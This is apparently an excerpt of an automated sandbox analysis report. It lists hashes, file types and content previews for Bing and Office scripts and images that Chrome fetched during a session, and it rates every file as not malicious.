                                                                                                    SHA-256:1562669AD323019CDA49A6CF3BDDECE1672282E7275F9D963031B30EA845FFB2
                                                                                                    SHA-512:CA0EB961E52D37CAA75F0F22012C045876A8B1A69DB583FE3232EA6A7787A85BEABC282F104C9FD236DA9A500BA15FDF7BD83C1639BFD73EF8EB6A910B75290D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var SsoFrame;(function(n){function t(n){if(n&&n.url&&n.sandbox){var t=sj_ce("iframe"),i=t.style;i.visibility="hidden";i.position="absolute";i.height="0";i.width="0";i.border="none";t.src=decodeURIComponent(n.url);t.id="aadssofr";t.setAttribute("sandbox",n.sandbox);_d.body.appendChild(t);n.currentEpoch&&sj_cook.set("SRCHUSR","T",n.currentEpoch,!0,"/");Log&&Log.Log&&Log.Log("ClientInst","NoSignInAttempt","OrgId",!1)}}function i(n){try{n&&n.length===2&&t(n[1])}catch(i){}}n.createFrame=t;n.ssoFrameEntry=i;sj_evt.bind("ssoFrameExists",i,!0,null,!1)})(SsoFrame||(SsoFrame={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (34732), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34732
                                                                                                    Entropy (8bit):5.452487645923916
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:+J0AmB7aPmB7aU1THyBVyD3NSrGyDQS+mZvUhM/4S8SrmB:+aaUaJCDA3DjHZv37n6
                                                                                                    MD5:E4FB9B839186660B1F729B8DF8C994B4
                                                                                                    SHA1:931792CD70CED4AD586F6329C30C294EBEA1548E
                                                                                                    SHA-256:6838611C8AB6539005E11C84CA308158F89A51DB57A62CAF21FAAB48BF576177
                                                                                                    SHA-512:625436BB52CBD7DF7ED03BE05FEA52C5D54B6CC15037D70C268D9598E648A22246DB902B9C6F097BA8B18BD924F6AB17120736285D54DCE13773237F1669853A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var ModernRewards;(function(n){var t="redDotDisplay",e="redDotDisplayFill",f="rewards_header_icon serp",o="rewards_header_icon hp",s="/red-dot-24.png",h="AutoOpenFlyoutFired",c="bfbNotificationShown",l="BNPNotificationShown",a="ChatVerticalShown",v="CookieDisabled",y="IsAADUser",p="MissingModel",w="_RwBf",b="rwmrst",i=!0,u="",r="//az15297.vo.msecnd.net/images/rewards/membercenter/missions/redDotImage.png",k=function(){function n(n){this.reportActivityModel=n;this.rewardsReadyEventArgs={isAuthenticated:n&&n.IsAuthenticated,isRebatesUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRebatesUser,isRewardsUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRewardUser,isTrialUser:n&&n.RewardsSessionData&&!n.RewardsSessionData.IsRewardUser&&n.RewardsSessionData.IsTrialUser,waitlist:n&&n.RewardsSessionData&&n.RewardsSessionData.Waitlist,isCcpEligible:n&&n.RewardsSessionData&&n.RewardsSessionData.IsCcpEligible,hasUsedCcpTrial:n&&n.RewardsSessionData&&n.RewardsSessionData.HasUsedCcpTrial}}re
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (622), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):622
                                                                                                    Entropy (8bit):5.265947581512117
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:2QxhNgpOWEaaRHkj6iLUEkFKgsmqRRV6alt0Tk6iLUEkFkno:2QTepraRHk+i1kFKgsmqRRVZr8k6i1kh
                                                                                                    MD5:3104955279E1BBBDB4AE5A0E077C5A74
                                                                                                    SHA1:BA10A722FFF1877C3379DEE7B5F028D467FFD6CF
                                                                                                    SHA-256:A0A1CEE602080757FBADB2D23EAD2BBB8B0726B82FDB2ED654DA4403F1E78EF1
                                                                                                    SHA-512:6937ED6194E4842FF5B4878B0D680E02CAF3185BAF65EDC131260B56A87968B5D6C80F236C1DE1A059D8158BC93B80B831FE679F38FC06DFB7C3413D1D5355AA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/uhCnIv_xh3wzed7ntfAo1Gf_1s8.js
                                                                                                    Preview:(function(){function n(){var n=_ge("id_p"),t,r,i;n&&(t="",r="",n.dataset?(t=n.dataset.src,r=n.dataset.alt):(t=n.getAttribute("data-src"),r=n.getAttribute("data-alt")),t&&t!=""&&(n.onerror=function(){n.onerror=null;n.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=";n.alt=""},n.onload=function(){n.alt=r},n.src=t,i=_d.getElementById("bp_shortcut_img"),i&&(i.setAttribute("src",t),i.onerror=function(){i.setAttribute("src","data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=")})))}n()})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):209
                                                                                                    Entropy (8bit):6.257245349235395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPl3xWrE9/gnbBE1d7snLQNylzkIgDhqo/1ir1216rTmVN80S+st2up:6v/lhPKwCnFGgQNyld+/ou6Hp0NsTp
                                                                                                    MD5:7D4555B1487EC50930C7567B2690BF10
                                                                                                    SHA1:544C4B9A47D0D12FD38FDC07900D32D31C0F600F
                                                                                                    SHA-256:50BBDF35A7DE6804B4E50971D7E3656D6C8100E4A03CF935F841D0AFD47D8371
                                                                                                    SHA-512:F293E1F06C7244C2FD080A65C3A32D134A6AF23E9148B8A391E242D8EA36297FFE8C500903B9B65A6E450EB1731ECF28CBE0A67F6E246938501BEBDDA5A6B177
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....sIDATXG....0...7...#.}$.....N..bu...,.....>>.mm....8....K....@....NW..n......cL..7....0....\...v.k.. ......`x....GT..{....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):97741
                                                                                                    Entropy (8bit):5.317413225936828
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:yomI9/afvZtvdKJiT315bQNrkSGQSv921rl1:aI9CfPciD158NrkO1
                                                                                                    MD5:C57CC11A511063B808F4A2C7745DF8D0
                                                                                                    SHA1:CEB6E14B7520A995C7E9C3BB6F3C1DCD56CCB5EE
                                                                                                    SHA-256:65628140B0930C3F9ED1A06A8F30F454245A08665047C6A95B592DFD164F4E9F
                                                                                                    SHA-512:CA8C7FCB456D3819FBA65A5040547D5A169FC5BDA9F1EA8479EA75C0580A57D02DC07525445F9FA7EC0D09CF2F38A6B8F71F297F715A0059AB8786D5D85BF948
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/bundles/otel-logger-cdec0b6428c58e375482.js
                                                                                                    Preview:(()=>{"use strict";var e={},n={};function t(r){var i=n[r];if(void 0!==i)return i.exports;var o=n[r]={id:r,loaded:!1,exports:{}};return e[r](o,o.exports,t),o.loaded=!0,o.exports}t.m=e,(()=>{var e,n=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__;t.t=function(r,i){if(1&i&&(r=this(r)),8&i)return r;if("object"==typeof r&&r){if(4&i&&r.__esModule)return r;if(16&i&&"function"==typeof r.then)return r}var o=Object.create(null);t.r(o);var a={};e=e||[null,n({}),n([]),n(n)];for(var u=2&i&&r;"object"==typeof u&&!~e.indexOf(u);u=n(u))Object.getOwnPropertyNames(u).forEach((e=>a[e]=()=>r[e]));return a.default=()=>r,t.d(o,a),o}})(),(()=>{t.d=(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})}})(),(()=>{t.f={},t.e=e=>Promise.all(Object.keys(t.f).reduce(((n,r)=>(t.f[r](e,n),n)),[]))})(),(()=>{t.u=e=>"inline.text-encoder-lite.chunk.js"})(),(()=>{t.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("retur
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1119 x 704, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):591728
                                                                                                    Entropy (8bit):7.996032737804013
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:BzVysRpODYLFLYXMaM48blnrCrjueL1oETab46OxEdB7ny2Q7e/:rODoSMcImr71eUXEPnBQq/
                                                                                                    MD5:8977DBD5387860CD8344B51DC4F00216
                                                                                                    SHA1:A0BCA65DE5D325B87EBDED22EC2EE9F459EED2DB
                                                                                                    SHA-256:6EA50E423008D71C95B019385D8A3D018DE4B9735870224B49EBA9B2E2A0263B
                                                                                                    SHA-512:EAEC056E681DFAC5CDEFBA16A1AB20CBDBD736AC77D14F018FD6C371F2D6C1F81ED46353B7661BB2E326A89E608D5B2B9097A0AD0F7ADF4DEF682AE835D75B13
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-commercial-1-mreb-8977dbd538.png
                                                                                                    Preview:.PNG........IHDR..._.........E:......pHYs.........&.:4....sRGB.........gAMA......a.....IDATx...I.mKr&.....9.{.....H.I1.Y.T.RBB@....h....@....j.Y.......5......T....lX.....|.........?3...9.y$.n.W.nnnn..,o.&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L...L..:`....~|s.....UV^IX.)?K).=+.y..w....j.[.e..2..%_...9._IJ...z=.G.Z..`...g...r...[...{....w(..?..1<%r..........w.&...`.~...&L.0a..3..-.................x...X..^...Z.......5.<..'O...+9\.,......9.0....=oN."....b._.{Zy.X.{I.e{.].......!...=.ER.-m.G.y...o...<.V`.?..i-...z.~.5...[.V..0-k*{...2....}J...ij..&%.R...+%.K.wz...r'Fy~....s.ZQ.gMYR}O%C.S)=......GO....\./.Zo...q.x7.dY.......g....w.Y.\x.....R.J..S...\.,.b......S.{J.?..[.M../.s......t....M..\.?P...W.&O8......W.....&u%.....A
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2278
                                                                                                    Entropy (8bit):7.856767134100099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:iDKXGoj9PKXto6lKBcIxT/hdMvM3zqNLyGqXKkBeDwRtR5c7upprdE3m:i8v9PKXmTBrMk3zqN4K4e05DppuW
                                                                                                    MD5:AF6A8C1315F461A7580BCDD0AE382928
                                                                                                    SHA1:D5C674FEEE0A2C29B1BE205F090BA91297825B79
                                                                                                    SHA-256:BAE9542A80849780EA4904578B980EE3B3D4845739E4A79ED069120FFB4704F5
                                                                                                    SHA-512:AD913D554E28AED786273064DD34D36DC8C4F0E036D3A1000F39A69C630039B677D346BDB7D0BB8A7489FA78DB42B0DB0F1324C8BC9D65D245596219947877A0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG..yP....ig.h.Ij26.4...i...).j..<......(......d.Y... ."...Y..AVY...&>.*....V-26m.3s..w..|.{.J..XA..(....I.\_..P.mX.kX.\O.;.O.....u..zf.%.Z..[;4|:....7r...)h.......1.?%Id.....i.....jz.;D5P.l..?..=.FX.x...$.A3i4NM..y..W.e.Y....S.~s...:R|cZ..@.4.. ....nhJ. .....4...Q.....K..t.\.Z.}..1.x.6(sB.. ........e`E..@.4/..........N.rs..0_.v....K.r....1.dI.2...'j.W..|..8v........g. ..B....B3...).`_..;s..B9v.....q.z..z&...t~.#.mD..=.h.^.....d.....%.M{..(..U/.h(........'...>.....sF..qp.&....U..5....../i.e.s.H..C......M...D.[?-A+....C.&..n...m.....O..g.._...M.[2.a.<x..c...UL.Ky.t...<..g..(..Y..C.I....%PV4...mF..a[....`...#.qT.b..._./..ip.g..=..]....I&..N.e..^S.&.3.@ ..2... J...=....f.P.k..[.Z`..'n...Y...F..oRx.......`^.#.g.E..Zy*..R...>T.;.x.}......v.C...[..P.......'.lwhX.=.s.F.L..<*.]....98.4.R......`......M....&.....dz...s.....C>K......6..;_.Q'a...?.7...b~..y^....Z9..s.7...@..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):226
                                                                                                    Entropy (8bit):4.923112772413901
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:2LGfGIEW65JcYCgfkF2/WHRMB58IIR/QxbM76Bhl:2RWIyYCwk4/EMB5ZccbM+B/
                                                                                                    MD5:A5363C37B617D36DFD6D25BFB89CA56B
                                                                                                    SHA1:31682AFCE628850B8CB31FAA8E9C4C5EC9EBB957
                                                                                                    SHA-256:8B4D85985E62C264C03C88B31E68DBABDCC9BD42F40032A43800902261FF373F
                                                                                                    SHA-512:E70F996B09E9FA94BA32F83B7AA348DC3A912146F21F9F7A7B5DEEA0F68CF81723AB4FEDF1BA12B46AA4591758339F752A4EBA11539BEB16E0E34AD7EC946763
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(n,t,i){if(t){var r=!1,f=function(){r||(r=!0,typeof wlc!="undefined"&&wlc(sj_evt,sj_cook.set,wlc_t))},u=function(){setTimeout(f,t)};n.bind("onP1",function(){i?n.bind("aad:signedout",u):u()},1)}})(sj_evt,wlc_d,wlc_wfa)
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):232
                                                                                                    Entropy (8bit):5.169977030133577
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:2LGXTM4d0QENnOto47NB6iHsrEi/DcSt8JjgICAJAfxito:2Q8nOu47SiHg/ijGmAio
                                                                                                    MD5:5B3E2FD8E824E69B2E32469C046A35E5
                                                                                                    SHA1:AC62B20D73E2FA61030D585DEED53E58D03EF74A
                                                                                                    SHA-256:9077771F70727A1D7007A97FEB2A07CE753E90E3D1DA19A733E46F36E7910397
                                                                                                    SHA-512:01FDE7361CEE5D3CE3093F55BFEA0745670004D228934A46064537288F983D26B62869EF969875E091045E6A28EAE3EF0D9E59E7DE824ED6B76CCE52A9FC7625
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/rGKyDXPi-mEDDVhd7tU-WNA-90o.js
                                                                                                    Preview:(function(){function r(r){t&&r[1]&&(typeof mmSetCW!==n&&mmSetCW(),t.show(r[1],!0,i));sj_evt.fire("clearHover")}var n="undefined",t=typeof IFrameOverlay!==n?IFrameOverlay:null,i="&mode=overlay";sj_evt.bind("IFrame.Navigate",r,!0)})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (3363), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3363
                                                                                                    Entropy (8bit):5.195022922251816
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rVnoyUQXHE2ugs6SI7kVsP1mB88bTg7IYeYU5qnjRXpHNXhgkGq:Z+yhCPFy12dbTQ3k5GjZjr
                                                                                                    MD5:FABB77C7AE3FD2271F5909155FB490E5
                                                                                                    SHA1:CDE0B1304B558B6DE7503D559C92014644736F88
                                                                                                    SHA-256:E482BF4BAAA167335F326B9B4F4B83E806CC21FB428B988A4932C806D918771C
                                                                                                    SHA-512:CABB38F7961AB11449A6E895657D39C947D422F0B3E1DA976494C53203E0E91ADFC514B6100E632939C4335C119165D2330512CAA7D836A6C863087775EDAA9F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},AccountLink;(function(n){function h(n,t){var i=a(n.accLinkRefreshEndPointUrl),r={url:i,requestType:"GET",onSuccess:t.onSuccess,onError:t.onError};v(r)}function s(n){var t=c(n);h(n,t)}function c(n){return{onSuccess:function(n){var e=sb_gt(),o=Math.floor(e/1e3)*1e3,f;sj_cook.set(r,u,o.toString(),!0,"/");t("Refresh Account Link info Success");i("onRefreshAccountLinkInfoResponse","success");f={IsTenantAllowAccountLink:n.IsTenantAllowAccountLink,HasLinkedAccount:n.HasLinkedAccount};n.AccountLinkUpdated&&(t("fire acclink:updated"),sj_evt.fire("acclink:updated",f));n.HasLinkedAccount&&n.IsTenantAllowAccountLink&&i("onRefreshAccountLinkInfoResponse","hasActiveLinkedAccount")},onError:function(f,e,o){var s=sb_gt(),h=Math.floor(s/1e3)*1e3,c=h-(n.refreshAccountLink
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 197x113, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):4065
                                                                                                    Entropy (8bit):7.855097209839883
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:CRCIrrL8j18B7jmUsH2gU7PN1HNOsk9Z0wXWj6H:FIrvjmtHWwXWjK
                                                                                                    MD5:F381F8D3AD2C73D1D8ED2BD3F7B53AC9
                                                                                                    SHA1:15499845A9A3E7565D0EDE01185D03CB9748335D
                                                                                                    SHA-256:A1CABEDD227586B2F7F4F2C0E73193205629402F3EBED1156007E2BFFA46F4A8
                                                                                                    SHA-512:89A0C85C8768B8EAD0CA09AA5BBFB38BB978136718F5E35AA6C3704F05097B7199F52FD9F80417B0997871070B7919D6F26548D526F70A71DD2704A998556223
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=ORMS.b2275b92de5f8f6ec776e05abd036213&w=197&h=113&c=6&rs=2&o=6&pid=Wdp
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............q...."......................................................{.......|...}...Yl8[[..Q..=..s...e...A.ZUj9..L.......8.~..\[W-..O..fl.9.OD.a '..2H....{&.f..3.eAYdv....;u.r..!o..vG~@....a........F.......lj...v^....x.7.....&..z~.1sv:^...q.hO...@..W.X....t.z.,^...L|..i..Z.Z,1..4....;.P[..bK.7=j.....<.....~.r......D..S..b...>.._x.&u...-M..4.}>.VE..m.D..........................................9...K./h.%...08z..9..KI....k..-..I`....u......Z!.W........d..e..NB...h".!..`. M..H&...(..g...(..........................2..!1.3."#AB...........c#.....E....>..uJ)...Ov&~`G.....V...l.......t\.(..h,*.Y..2Bc8.23.SI.......Z...y........Lr.0Y~...V.6..U......^..-.Z.'8....8.r...8U._.H.0k....\N*.p+2..P..L.a...E...zrR=...J..~....8...2.+.m.....Aj_dP.f....q,Ar....F$ HX.#0P..f$\`..5.....).}e...?.^.....Ep.../0..7.j....jJ.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 197x113, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3916
                                                                                                    Entropy (8bit):7.876964509090141
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:EkT4b5q3IGOh8mKJwGvCkxeC5cg8L6aVLjjB:h5IFO7euvxeCevVjjB
                                                                                                    MD5:D03BDCFC68ACAB3B77AA1C3BF8B9CEA7
                                                                                                    SHA1:36C4F21F1F2FC8BF4B1B7E0E0BAFFB6A502BB254
                                                                                                    SHA-256:929A95BBEFF072800A15E701B73843B5C5AD856112B02D1A59857CFD8E577D96
                                                                                                    SHA-512:80EED277402400E454DCCAD6D6A69D5701AFBC1B158EC324AF27BD14E7CFA5961747A07B5851D795BDFC5EEAF1BE10DD8BF91183E5010C5A854D78C372812463
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............q...."....................................................!...d..GI.\....@A..Yz.j......U.....#/fY`)U... 1[.q...5.1%F....i..i.H-0....q....{9..^..c...4.W...W.].n/.Ty...b...i.1..u1...|.........B....D...M.o........;9.../....5;6..e..Uh....yO...5.v..+......-..s....zX...f:.W.e.$.#..sO..5p.Dc.\..&:.L$8).AW.......)..)p......."...6....wwr......K.........................................@....'_G<..[.D..n,.yX..<..qJ...;...W2..z.H..;y3...._[....{...|C^}.L......_/...Zy...-5-<v.3.....M.!E.c..F..`!..O...:........................!.1.."AQq...2a..BRS.. 3b.#CDr4s.........?..|.I...N..9..l..i..yf.r...E'qSL^.Ull.}H$..S.B...za.f....O.V....~..A....{...n.....>.E....q..,(.qW..4..>$Q].G.o.y.n.[b.|..@.H.o..$O#.A.~. ..'...!C(...jQ.@<.!.ix..;.::..W!.@....{u</m..i$..U..(.2I.}}>= 8....6.,?......#.]r..\...`E........7G...y.4./X..V....
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4286
                                                                                                    Entropy (8bit):1.4428178104858655
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:sfyl+rblmboWbol4bolnbsoItwqol0roooooosEol07ooooooooooolxo/lmyosh:suE9gwXZBQ4Nxbk7/GrQV/z1nfx
                                                                                                    MD5:30967B1B52CB6DF18A8AF8FCC04F83C9
                                                                                                    SHA1:AAF67CD84FCD64FB2D8974D7135D6F1E4FC03588
                                                                                                    SHA-256:439B6089E45EF1E0C37EF88764D5C99A3B2752609C4E2AF3376480D7FFCFAF2E
                                                                                                    SHA-512:7CB3C09A81FBD301741E7CF5296C406BAF1C76685D354C54457C87F6471867390A1AEED9F95701EB9361D7DFACCE31AFD1D240841037FC1DE4A120C66C1B088C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:...... .... .........(... ...@..... .........%...%........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n...n...n....................................................................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):4565
                                                                                                    Entropy (8bit):7.879534543139402
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                                                    MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                                    SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                                    SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                                    SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/UHFbanner-MSlogo?fmt=png-alpha&bfc=off&qlt=100,1"
                                                                                                    Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1111
                                                                                                    Entropy (8bit):4.61511796141903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:twgonGLheJUVYxCdBTMqTS05sLGkkhQgbQgwHW4QhJ:6gAShpyxCdBTrS05sLKhvUfSJ
                                                                                                    MD5:C04C8834AC91802186E6CE677AE4A89D
                                                                                                    SHA1:367147873DA32FACB30A1B4885A07920854A6399
                                                                                                    SHA-256:46CC84BA382B065045DB005E895414686F2E76B64AF854F5AD1AC0DF020C3BDB
                                                                                                    SHA-512:82388309085BD143E32981FE4C79604DCEFC4222FB2B53A8625852C3572BDE3D3A578DD558478E6A18F7863CC4EC19DFBA3EE78AD8A4CC71917BFFE027DC22C0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/NnFHhz2jL6yzChtIhaB5IIVKY5k.svg
                                                                                                    Preview:<svg width="20px" height="16px" viewBox="0 0 20 16" focusable="false" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <g transform="translate(-10, -12)" fill="#007DAA" >.. <path d="M28.125,14.4615385 L25,14.4615385 L24.26875,13.0203077 C23.95125,12.3950769 23.30125,12 22.59125,12 L17.40875,12 C16.69875,12 16.04875,12.3950769 15.73125,13.0203077 L15,14.4615385 L11.875,14.4615385 C10.84,14.4615385 10,15.2886154 10,16.3076923 L10,26.1538462 C10,27.1729231 10.84,28 11.875,28 L28.125,28 C29.16,28 30,27.1729231 30,26.1538462 L30,16.3076923 C30,15.2886154 29.16,14.4615385 28.125,14.4615385 Z M20,25.5384615 C17.23875,25.5384615 15,23.3341538 15,20.6153846 C15,17.8966154 17.23875,15.6923077 20,15.6923077 C22.76125,15.6923077 25,17.8966154 25,20.6153846 C25,23.3341538 22.76125,25.5384615 20,25.5384615 Z M20,18.1538462 C18.62125,18.1538462 17.5,19.2578462 17.5,20.6153846 C17.5,21.9729231 18.62125,23.0769231 20,23.0769231 C21.37875,23.0769231
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:43:45], progressive, precision 8, 160x160, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):3814
                                                                                                    Entropy (8bit):7.634659202076907
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:sQrbnTt8ATpTToooX6l4d309BEEGp0m1amWth0x/aA+9GnPoYXEcX:sS8AyJKl4xV0KamWtOb+SP0cX
                                                                                                    MD5:281570611F89219A970F2589F98A09DB
                                                                                                    SHA1:9E2DCCC8A295BBDA4AD12818EA06FA67634E1A98
                                                                                                    SHA-256:7BDAB4155253E159B748E2BE6CB1C0AF736F18D2A4DBDDF79D93D6219A3DE9DD
                                                                                                    SHA-512:FB9CAEE5B3FF8A3CE8C4D6D066CC0283A8A158E32131754CD9EFB1B4A25303CAA72FAE11C23E836B2A2F0D5005F0E39EB2A38D1D28CB81CAE5C1C818D77B80FB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/ni3MyKKVu9pK0SgY6gb6Z2NOGpg.jpg
